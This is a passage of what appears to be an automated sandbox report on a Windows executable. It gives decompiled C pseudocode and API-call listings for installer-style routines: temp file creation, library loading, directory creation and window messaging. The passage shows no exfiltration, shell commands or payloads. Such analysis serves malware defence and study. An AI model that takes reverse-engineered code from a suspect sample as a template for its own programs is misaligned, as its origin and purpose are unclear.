                                                					_t19 = 0x1a;
                                                					_v8 = _v8 + _t14 % _t19;
                                                					_t17 = GetTempFileNameW(_a8,  &_v12, 0, _t26); // executed
                                                					if(_t17 != 0) {
                                                						break;
                                                					}
                                                					if(_t23 != 0) {
                                                						continue;
                                                					} else {
                                                						 *_t26 =  *_t26 & _t23;
                                                					}
                                                					L4:
                                                					return _t17;
                                                				}
                                                				_t17 = _t26;
                                                				goto L4;
                                                			}












                                                0x00406062
                                                0x00406068
                                                0x00406069
                                                0x00406069
                                                0x0040606e
                                                0x0040606f
                                                0x00406072
                                                0x00406077
                                                0x0040607a
                                                0x00406084
                                                0x00406091
                                                0x00406095
                                                0x0040609d
                                                0x00000000
                                                0x00000000
                                                0x004060a1
                                                0x00000000
                                                0x004060a3
                                                0x004060a3
                                                0x004060a3
                                                0x004060a6
                                                0x004060a9
                                                0x004060a9
                                                0x004060ac
                                                0x00000000

                                                APIs
                                                • GetTickCount.KERNEL32(74EDD4C4,C:\Users\user\AppData\Local\Temp\,?,?,?,0040352B,1033,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403810), ref: 0040607A
                                                • GetTempFileNameW.KERNELBASE(?,?,00000000,?,?,?,?,0040352B,1033,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403810), ref: 00406095
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000003.00000002.687854101.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000003.00000002.687851142.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000003.00000002.687859110.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000003.00000002.687862814.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000003.00000002.687875950.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000003.00000002.687891941.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000003.00000002.687919476.0000000000442000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000003.00000002.687924807.000000000044C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_3_2_400000_vbc.jbxd
                                                Similarity
                                                • API ID: CountFileNameTempTick
                                                • String ID: C:\Users\user\AppData\Local\Temp\$nsa
                                                • API String ID: 1716503409-4262883142
                                                • Opcode ID: 418a87fb760587bef7583f4f3acae06d17b3011fc99645d3e11ea5bfcaa5fca8
                                                • Instruction ID: cc98cbd97bba9fac9576f26979179aa346a2ab2dc3c85b14509754d74f2b81c3
                                                • Opcode Fuzzy Hash: 418a87fb760587bef7583f4f3acae06d17b3011fc99645d3e11ea5bfcaa5fca8
                                                • Instruction Fuzzy Hash: CEF09076B40204FBEB00CF69ED05E9EB7BCEB95750F11803AFA05F7140E6B499648768
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 946 4020d8-4020e4 947 4021a3-4021a5 946->947 948 4020ea-402100 call 402da6 * 2 946->948 950 4022f1-4022f6 call 401423 947->950 957 402110-40211f LoadLibraryExW 948->957 958 402102-40210e GetModuleHandleW 948->958 955 402c2a-402c39 950->955 960 402121-402130 call 406979 957->960 961 40219c-40219e 957->961 958->957 958->960 965 402132-402138 960->965 966 40216b-402170 call 40559f 960->966 961->950 968 402151-402164 call 73281817 965->968 969 40213a-402146 call 401423 965->969 970 402175-402178 966->970 972 402166-402169 968->972 969->970 978 402148-40214f 969->978 970->955 973 40217e-402188 call 403b8c 970->973 972->970 973->955 979 40218e-402197 FreeLibrary 973->979 978->970 979->955
                                                C-Code - Quality: 60%
                                                			E004020D8(void* __ebx, void* __eflags) {
                                                				struct HINSTANCE__* _t23;
                                                				struct HINSTANCE__* _t31;
                                                				void* _t32;
                                                				WCHAR* _t35;
                                                				intOrPtr* _t36;
                                                				void* _t37;
                                                				void* _t39;
                                                
                                                				_t32 = __ebx;
                                                				asm("sbb eax, 0x434fc0");
                                                				 *(_t39 - 4) = 1;
                                                				if(__eflags < 0) {
                                                					_push(0xffffffe7);
                                                					L15:
                                                					E00401423();
                                                					L16:
                                                					 *0x434f88 =  *0x434f88 +  *(_t39 - 4);
                                                					return 0;
                                                				}
                                                				_t35 = E00402DA6(0xfffffff0);
                                                				 *((intOrPtr*)(_t39 - 0x44)) = E00402DA6(1);
                                                				if( *((intOrPtr*)(_t39 - 0x20)) == __ebx) {
                                                					L3:
                                                					_t23 = LoadLibraryExW(_t35, _t32, 8); // executed
                                                					_t47 = _t23 - _t32;
                                                					 *(_t39 + 8) = _t23;
                                                					if(_t23 == _t32) {
                                                						_push(0xfffffff6);
                                                						goto L15;
                                                					}
                                                					L4:
                                                					_t36 = E00406979(_t47,  *(_t39 + 8),  *((intOrPtr*)(_t39 - 0x44)));
                                                					if(_t36 == _t32) {
                                                						E0040559F(0xfffffff7,  *((intOrPtr*)(_t39 - 0x44)));
                                                					} else {
                                                						 *(_t39 - 4) = _t32;
                                                						if( *((intOrPtr*)(_t39 - 0x28)) == _t32) {
                                                							 *_t36( *((intOrPtr*)(_t39 - 8)), 0x400, _t37, 0x40ce50, 0x40a000); // executed
                                                						} else {
                                                							E00401423( *((intOrPtr*)(_t39 - 0x28)));
                                                							if( *_t36() != 0) {
                                                								 *(_t39 - 4) = 1;
                                                							}
                                                						}
                                                					}
                                                					if( *((intOrPtr*)(_t39 - 0x24)) == _t32 && E00403B8C( *(_t39 + 8)) != 0) {
                                                						FreeLibrary( *(_t39 + 8));
                                                					}
                                                					goto L16;
                                                				}
                                                				_t31 = GetModuleHandleW(_t35); // executed
                                                				 *(_t39 + 8) = _t31;
                                                				if(_t31 != __ebx) {
                                                					goto L4;
                                                				}
                                                				goto L3;
                                                			}










                                                0x004020d8
                                                0x004020d8
                                                0x004020dd
                                                0x004020e4
                                                0x004021a3
                                                0x004022f1
                                                0x004022f1
                                                0x00402c2a
                                                0x00402c2d
                                                0x00402c39
                                                0x00402c39
                                                0x004020f3
                                                0x004020fd
                                                0x00402100
                                                0x00402110
                                                0x00402114
                                                0x0040211a
                                                0x0040211c
                                                0x0040211f
                                                0x0040219c
                                                0x00000000
                                                0x0040219c
                                                0x00402121
                                                0x0040212c
                                                0x00402130
                                                0x00402170
                                                0x00402132
                                                0x00402135
                                                0x00402138
                                                0x00402164
                                                0x0040213a
                                                0x0040213d
                                                0x00402146
                                                0x00402148
                                                0x00402148
                                                0x00402146
                                                0x00402138
                                                0x00402178
                                                0x00402191
                                                0x00402191
                                                0x00000000
                                                0x00402178
                                                0x00402103
                                                0x0040210b
                                                0x0040210e
                                                0x00000000
                                                0x00000000
                                                0x00000000

                                                APIs
                                                • GetModuleHandleW.KERNELBASE(00000000,00000001,000000F0), ref: 00402103
                                                  • Part of subcall function 0040559F: lstrlenW.KERNEL32(Skipped: C:\Users\user\AppData\Local\Temp\nsb88D0.tmp\System.dll,00000000,00425A20,74EC110C,?,?,?,?,?,?,?,?,?,00403418,00000000,?), ref: 004055D7
                                                  • Part of subcall function 0040559F: lstrlenW.KERNEL32(00403418,Skipped: C:\Users\user\AppData\Local\Temp\nsb88D0.tmp\System.dll,00000000,00425A20,74EC110C,?,?,?,?,?,?,?,?,?,00403418,00000000), ref: 004055E7
                                                  • Part of subcall function 0040559F: lstrcatW.KERNEL32 ref: 004055FA
                                                  • Part of subcall function 0040559F: SetWindowTextW.USER32 ref: 0040560C
                                                  • Part of subcall function 0040559F: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405632
                                                  • Part of subcall function 0040559F: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 0040564C
                                                  • Part of subcall function 0040559F: SendMessageW.USER32(?,00001013,?,00000000), ref: 0040565A
                                                • LoadLibraryExW.KERNELBASE(00000000,?,00000008,00000001,000000F0), ref: 00402114
                                                • FreeLibrary.KERNEL32(?,?,000000F7,?,?,00000008,00000001,000000F0), ref: 00402191
                                                Memory Dump Source
                                                • Source File: 00000003.00000002.687854101.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000003.00000002.687851142.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000003.00000002.687859110.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000003.00000002.687862814.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000003.00000002.687875950.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000003.00000002.687891941.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000003.00000002.687919476.0000000000442000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000003.00000002.687924807.000000000044C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_3_2_400000_vbc.jbxd
                                                Similarity
                                                • API ID: MessageSend$Librarylstrlen$FreeHandleLoadModuleTextWindowlstrcat
                                                • String ID:
                                                • API String ID: 334405425-0
                                                • Opcode ID: f19c79c5fba68d9d0d2f2fda6ec06f6b63f6e40353c0f80915a645696cb571d2
                                                • Instruction ID: d1cf9917c249e547a3b1759614bc69e8b445b1996c4dbd71fd6f6dd46acd7470
                                                • Opcode Fuzzy Hash: f19c79c5fba68d9d0d2f2fda6ec06f6b63f6e40353c0f80915a645696cb571d2
                                                • Instruction Fuzzy Hash: 2A21C231904104FACF11AFA5CE48A9D7A71BF48358F20413BF605B91E1DBBD8A82965D
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 981 4015c1-4015d5 call 402da6 call 405eb7 986 401631-401634 981->986 987 4015d7-4015ea call 405e39 981->987 989 401663-4022f6 call 401423 986->989 990 401636-401655 call 401423 call 40653d SetCurrentDirectoryW 986->990 995 401604-401607 call 405aeb 987->995 996 4015ec-4015ef 987->996 1002 402c2a-402c39 989->1002 990->1002 1007 40165b-40165e 990->1007 1005 40160c-40160e 995->1005 996->995 1001 4015f1-4015f8 call 405b08 996->1001 1001->995 1011 4015fa-4015fd call 405a6e 1001->1011 1008 401610-401615 1005->1008 1009 401627-40162f 1005->1009 1007->1002 1012 401624 1008->1012 1013 401617-401622 GetFileAttributesW 1008->1013 1009->986 1009->987 1016 401602 1011->1016 1012->1009 1013->1009 1013->1012 1016->1005
                                                C-Code - Quality: 86%
                                                			E004015C1(short __ebx, void* __eflags) {
                                                				void* _t17;
                                                				int _t23;
                                                				void* _t25;
                                                				signed char _t26;
                                                				short _t28;
                                                				short _t31;
                                                				short* _t34;
                                                				void* _t36;
                                                
                                                				_t28 = __ebx;
                                                				 *(_t36 + 8) = E00402DA6(0xfffffff0);
                                                				_t17 = E00405EB7(_t16);
                                                				_t32 = _t17;
                                                				if(_t17 != __ebx) {
                                                					do {
                                                						_t34 = E00405E39(_t32, 0x5c);
                                                						_t31 =  *_t34;
                                                						 *_t34 = _t28;
                                                						if(_t31 != _t28) {
                                                							L5:
                                                							_t25 = E00405AEB( *(_t36 + 8));
                                                						} else {
                                                							_t42 =  *((intOrPtr*)(_t36 - 0x28)) - _t28;
                                                							if( *((intOrPtr*)(_t36 - 0x28)) == _t28 || E00405B08(_t42) == 0) {
                                                								goto L5;
                                                							} else {
                                                								_t25 = E00405A6E( *(_t36 + 8)); // executed
                                                							}
                                                						}
                                                						if(_t25 != _t28) {
                                                							if(_t25 != 0xb7) {
                                                								L9:
                                                								 *((intOrPtr*)(_t36 - 4)) =  *((intOrPtr*)(_t36 - 4)) + 1;
                                                							} else {
                                                								_t26 = GetFileAttributesW( *(_t36 + 8)); // executed
                                                								if((_t26 & 0x00000010) == 0) {
                                                									goto L9;
                                                								}
                                                							}
                                                						}
                                                						 *_t34 = _t31;
                                                						_t32 = _t34 + 2;
                                                					} while (_t31 != _t28);
                                                				}
                                                				if( *((intOrPtr*)(_t36 - 0x2c)) == _t28) {
                                                					_push(0xfffffff5);
                                                					E00401423();
                                                				} else {
                                                					E00401423(0xffffffe6);
                                                					E0040653D(0x441000,  *(_t36 + 8));
                                                					_t23 = SetCurrentDirectoryW( *(_t36 + 8)); // executed
                                                					if(_t23 == 0) {
                                                						 *((intOrPtr*)(_t36 - 4)) =  *((intOrPtr*)(_t36 - 4)) + 1;
                                                					}
                                                				}
                                                				 *0x434f88 =  *0x434f88 +  *((intOrPtr*)(_t36 - 4));
                                                				return 0;
                                                			}











                                                0x004015c1
                                                0x004015c9
                                                0x004015cc
                                                0x004015d1
                                                0x004015d5
                                                0x004015d7
                                                0x004015df
                                                0x004015e1
                                                0x004015e4
                                                0x004015ea
                                                0x00401604
                                                0x00401607
                                                0x004015ec
                                                0x004015ec
                                                0x004015ef
                                                0x00000000
                                                0x004015fa
                                                0x004015fd
                                                0x004015fd
                                                0x004015ef
                                                0x0040160e
                                                0x00401615
                                                0x00401624
                                                0x00401624
                                                0x00401617
                                                0x0040161a
                                                0x00401622
                                                0x00000000
                                                0x00000000
                                                0x00401622
                                                0x00401615
                                                0x00401627
                                                0x0040162b
                                                0x0040162c
                                                0x004015d7
                                                0x00401634
                                                0x00401663
                                                0x004022f1
                                                0x00401636
                                                0x00401638
                                                0x00401645
                                                0x0040164d
                                                0x00401655
                                                0x0040165b
                                                0x0040165b
                                                0x00401655
                                                0x00402c2d
                                                0x00402c39

                                                APIs
                                                  • Part of subcall function 00405EB7: CharNextW.USER32(?), ref: 00405EC5
                                                  • Part of subcall function 00405EB7: CharNextW.USER32(00000000), ref: 00405ECA
                                                  • Part of subcall function 00405EB7: CharNextW.USER32(00000000), ref: 00405EE2
                                                • GetFileAttributesW.KERNELBASE(?,?,00000000,0000005C,00000000,000000F0), ref: 0040161A
                                                  • Part of subcall function 00405A6E: CreateDirectoryW.KERNELBASE(?,?,C:\Users\user\AppData\Local\Temp\), ref: 00405AB1
                                                • SetCurrentDirectoryW.KERNELBASE(?,00441000,?,00000000,000000F0), ref: 0040164D
                                                Memory Dump Source
                                                • Source File: 00000003.00000002.687854101.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000003.00000002.687851142.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000003.00000002.687859110.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000003.00000002.687862814.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000003.00000002.687875950.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000003.00000002.687891941.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000003.00000002.687919476.0000000000442000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000003.00000002.687924807.000000000044C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_3_2_400000_vbc.jbxd
                                                Similarity
                                                • API ID: CharNext$Directory$AttributesCreateCurrentFile
                                                • String ID:
                                                • API String ID: 1892508949-0
                                                • Opcode ID: 82ddaba883c43a6ad6c7d32de7d3b1a72e39ab97507aea11bcb184130d63296d
                                                • Instruction ID: 910f9ca0e916fbda017ea5bccd1daba2d9720f9cae8b5c5670dceb894c5ef12e
                                                • Opcode Fuzzy Hash: 82ddaba883c43a6ad6c7d32de7d3b1a72e39ab97507aea11bcb184130d63296d
                                                • Instruction Fuzzy Hash: 3E11D031504110EBCF216FA5CD4099F36A0EF25369B28493BE945B52F1DA3E4A829A8E
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                C-Code - Quality: 69%
                                                			E00401389(signed int _a4) {
                                                				intOrPtr* _t6;
                                                				void* _t8;
                                                				void* _t10;
                                                				signed int _t11;
                                                				void* _t12;
                                                				signed int _t16;
                                                				signed int _t17;
                                                				void* _t18;
                                                
                                                				_t17 = _a4;
                                                				while(_t17 >= 0) {
                                                					_t6 = _t17 * 0x1c +  *0x434f30;
                                                					if( *_t6 == 1) {
                                                						break;
                                                					}
                                                					_push(_t6); // executed
                                                					_t8 = E00401434(); // executed
                                                					if(_t8 == 0x7fffffff) {
                                                						return 0x7fffffff;
                                                					}
                                                					_t10 = E0040136D(_t8);
                                                					if(_t10 != 0) {
                                                						_t11 = _t10 - 1;
                                                						_t16 = _t17;
                                                						_t17 = _t11;
                                                						_t12 = _t11 - _t16;
                                                					} else {
                                                						_t12 = _t10 + 1;
                                                						_t17 = _t17 + 1;
                                                					}
                                                					if( *((intOrPtr*)(_t18 + 0xc)) != 0) {
                                                						 *0x433eec =  *0x433eec + _t12;
                                                						SendMessageW( *(_t18 + 0x18), 0x402, MulDiv( *0x433eec, 0x7530,  *0x433ed4), 0); // executed
                                                					}
                                                				}
                                                				return 0;
                                                			}











                                                0x0040138a
                                                0x004013fa
                                                0x0040139b
                                                0x004013a0
                                                0x00000000
                                                0x00000000
                                                0x004013a2
                                                0x004013a3
                                                0x004013ad
                                                0x00000000
                                                0x00401404
                                                0x004013b0
                                                0x004013b7
                                                0x004013bd
                                                0x004013be
                                                0x004013c0
                                                0x004013c2
                                                0x004013b9
                                                0x004013b9
                                                0x004013ba
                                                0x004013ba
                                                0x004013c9
                                                0x004013cb
                                                0x004013f4
                                                0x004013f4
                                                0x004013c9
                                                0x00000000

                                                APIs
                                                • MulDiv.KERNEL32 ref: 004013E4
                                                • SendMessageW.USER32(?,00000402,00000000), ref: 004013F4
                                                Memory Dump Source
                                                • Source File: 00000003.00000002.687854101.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000003.00000002.687851142.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000003.00000002.687859110.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000003.00000002.687862814.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000003.00000002.687875950.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000003.00000002.687891941.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000003.00000002.687919476.0000000000442000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000003.00000002.687924807.000000000044C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_3_2_400000_vbc.jbxd
                                                Similarity
                                                • API ID: MessageSend
                                                • String ID:
                                                • API String ID: 3850602802-0
                                                • Opcode ID: d8feea9b0bd879c8f8267a4ec85e9a32d700cac98845316580bbb569ce856791
                                                • Instruction ID: f98c5e72cab4da6dd47fcf147c12dc0649e5852bd482257a86ca63d172a8b8d6
                                                • Opcode Fuzzy Hash: d8feea9b0bd879c8f8267a4ec85e9a32d700cac98845316580bbb569ce856791
                                                • Instruction Fuzzy Hash: 0B01F4316202209FE7094B389D05B6A3698E710319F14823FF851F65F1EA78DC029B4C
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                C-Code - Quality: 50%
                                                			E00405672(signed int __eax) {
                                                				intOrPtr _v0;
                                                				intOrPtr _t10;
                                                				intOrPtr _t11;
                                                				intOrPtr* _t12;
                                                
                                                				_t11 =  *0x434f28;
                                                				_t10 =  *0x434f2c;
                                                				__imp__OleInitialize(0); // executed
                                                				 *0x434fc0 =  *0x434fc0 | __eax;
                                                				E004044E5(0);
                                                				if(_t10 != 0) {
                                                					_t12 = _t11 + 0xc;
                                                					while(1) {
                                                						_t10 = _t10 - 1;
                                                						if(( *(_t12 - 4) & 0x00000001) != 0 && E00401389( *_t12, _v0) != 0) {
                                                							break;
                                                						}
                                                						_t12 = _t12 + 0x818;
                                                						if(_t10 != 0) {
                                                							continue;
                                                						} else {
                                                						}
                                                						goto L7;
                                                					}
                                                					 *0x434f8c =  *0x434f8c + 1;
                                                				}
                                                				L7:
                                                				E004044E5(0x404);
                                                				__imp__OleUninitialize();
                                                				return  *0x434f8c;
                                                			}







                                                0x00405673
                                                0x0040567a
                                                0x00405682
                                                0x00405688
                                                0x00405690
                                                0x00405697
                                                0x00405699
                                                0x0040569c
                                                0x0040569c
                                                0x004056a1
                                                0x00000000
                                                0x00000000
                                                0x004056b2
                                                0x004056ba
                                                0x00000000
                                                0x00000000
                                                0x004056bc
                                                0x00000000
                                                0x004056ba
                                                0x004056be
                                                0x004056be
                                                0x004056c4
                                                0x004056c9
                                                0x004056ce
                                                0x004056db

                                                APIs
                                                • OleInitialize.OLE32(00000000), ref: 00405682
                                                  • Part of subcall function 004044E5: SendMessageW.USER32(?,00000000,00000000,00000000), ref: 004044F7
                                                • OleUninitialize.OLE32 ref: 004056CE
                                                Memory Dump Source
                                                • Source File: 00000003.00000002.687854101.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000003.00000002.687851142.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000003.00000002.687859110.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000003.00000002.687862814.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000003.00000002.687875950.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000003.00000002.687891941.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000003.00000002.687919476.0000000000442000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000003.00000002.687924807.000000000044C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_3_2_400000_vbc.jbxd
                                                Similarity
                                                • API ID: InitializeMessageSendUninitialize
                                                • String ID:
                                                • API String ID: 2896919175-0
                                                • Opcode ID: 373f90d4a1babe4f1a04baa381ba9309e44634cfc63d647d34b32aa976a59a0d
                                                • Instruction ID: 6be4ff692d487ef8b3e25caebddd25c5d55207980f196ef2193ccf2f8785d180
                                                • Opcode Fuzzy Hash: 373f90d4a1babe4f1a04baa381ba9309e44634cfc63d647d34b32aa976a59a0d
                                                • Instruction Fuzzy Hash: B3F0F0765006009AE6115B95A901BA677A8EBD4316F49883AEF88632E0CB365C418A1C
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                • ShowWindow.USER32(00000000,00000000), ref: 00401EFC
                                                • EnableWindow.USER32(00000000,00000000), ref: 00401F07
                                                Memory Dump Source
                                                • Source File: 00000003.00000002.687854101.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000003.00000002.687851142.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000003.00000002.687859110.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000003.00000002.687862814.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000003.00000002.687875950.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000003.00000002.687891941.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000003.00000002.687919476.0000000000442000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000003.00000002.687924807.000000000044C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_3_2_400000_vbc.jbxd
                                                Similarity
                                                • API ID: Window$EnableShow
                                                • String ID:
                                                • API String ID: 1136574915-0
                                                • Opcode ID: 17fdff3635e274bccff740d5b56a6ff11ee3748df7be710f89f234bf033d1564
                                                • Instruction ID: ff95e9915c8c9942b49c08d49a5710ecdabad47c7be9b03b7ba0a01474a23479
                                                • Opcode Fuzzy Hash: 17fdff3635e274bccff740d5b56a6ff11ee3748df7be710f89f234bf033d1564
                                                • Instruction Fuzzy Hash: E7E04872908211CFE705EBA4EE495AD77F4EF40325710497FE501F11D1DBB55D00965D
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                C-Code - Quality: 100%
                                                			E0040690A(signed int _a4) {
                                                				struct HINSTANCE__* _t5;
                                                				signed int _t10;
                                                
                                                				_t10 = _a4 << 3;
                                                				_t8 =  *(_t10 + 0x40a3e0);
                                                				_t5 = GetModuleHandleA( *(_t10 + 0x40a3e0));
                                                				if(_t5 != 0) {
                                                					L2:
                                                					return GetProcAddress(_t5,  *(_t10 + 0x40a3e4));
                                                				}
                                                				_t5 = E0040689A(_t8); // executed
                                                				if(_t5 == 0) {
                                                					return 0;
                                                				}
                                                				goto L2;
                                                			}





                                                0x00406912
                                                0x00406915
                                                0x0040691c
                                                0x00406924
                                                0x00406930
                                                0x00000000
                                                0x00406937
                                                0x00406927
                                                0x0040692e
                                                0x00000000
                                                0x0040693f
                                                0x00000000

                                                APIs
                                                • GetModuleHandleA.KERNEL32(?,00000020,?,0040363D,0000000B), ref: 0040691C
                                                • GetProcAddress.KERNEL32(00000000,?), ref: 00406937
                                                  • Part of subcall function 0040689A: GetSystemDirectoryW.KERNEL32(?,00000104), ref: 004068B1
                                                  • Part of subcall function 0040689A: wsprintfW.USER32 ref: 004068EC
                                                  • Part of subcall function 0040689A: LoadLibraryExW.KERNELBASE(?,00000000,00000008), ref: 00406900
                                                Memory Dump Source
                                                • Source File: 00000003.00000002.687854101.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000003.00000002.687851142.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000003.00000002.687859110.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000003.00000002.687862814.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000003.00000002.687875950.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000003.00000002.687891941.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000003.00000002.687919476.0000000000442000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000003.00000002.687924807.000000000044C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_3_2_400000_vbc.jbxd
                                                Similarity
                                                • API ID: AddressDirectoryHandleLibraryLoadModuleProcSystemwsprintf
                                                • String ID:
                                                • API String ID: 2547128583-0
                                                • Opcode ID: c7c26614299f557633109f7ac2ccf4e744cd73af09153470ea8035ac80f12020
                                                • Instruction ID: 98bdf7d71c6046f852b78b75196177710d0a141037308efd39b2ac7baa162fea
                                                • Opcode Fuzzy Hash: c7c26614299f557633109f7ac2ccf4e744cd73af09153470ea8035ac80f12020
                                                • Instruction Fuzzy Hash: 9FE0867390422066D21196745D44D7773A89B99750306443EF946F2090DB38DC31A76E
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                C-Code - Quality: 68%
                                                			E0040602D(WCHAR* _a4, long _a8, long _a12) {
                                                				signed int _t5;
                                                				void* _t6;
                                                
                                                				_t5 = GetFileAttributesW(_a4); // executed
                                                				asm("sbb ecx, ecx");
                                                				_t6 = CreateFileW(_a4, _a8, 1, 0, _a12,  ~(_t5 + 1) & _t5, 0); // executed
                                                				return _t6;
                                                			}





                                                0x00406031
                                                0x0040603e
                                                0x00406053
                                                0x00406059

                                                APIs
                                                • GetFileAttributesW.KERNELBASE(00000003,004030BD,00443800,80000000,00000003,?,?,?,?,?,0040387D,?), ref: 00406031
                                                • CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000), ref: 00406053
                                                Memory Dump Source
                                                • Source File: 00000003.00000002.687854101.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000003.00000002.687851142.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000003.00000002.687859110.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000003.00000002.687862814.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000003.00000002.687875950.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000003.00000002.687891941.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000003.00000002.687919476.0000000000442000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000003.00000002.687924807.000000000044C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_3_2_400000_vbc.jbxd
                                                Similarity
                                                • API ID: File$AttributesCreate
                                                • String ID:
                                                • API String ID: 415043291-0
                                                • Opcode ID: 080dfadfdaad2818d5b04c51cfada36c475993ea7ffea5996e238fb5a0e3a6c4
                                                • Instruction ID: 1030bc0f2bf25390ef9c6131bda9d6cfedcac9e68b753c15eded60bf4a570351
                                                • Opcode Fuzzy Hash: 080dfadfdaad2818d5b04c51cfada36c475993ea7ffea5996e238fb5a0e3a6c4
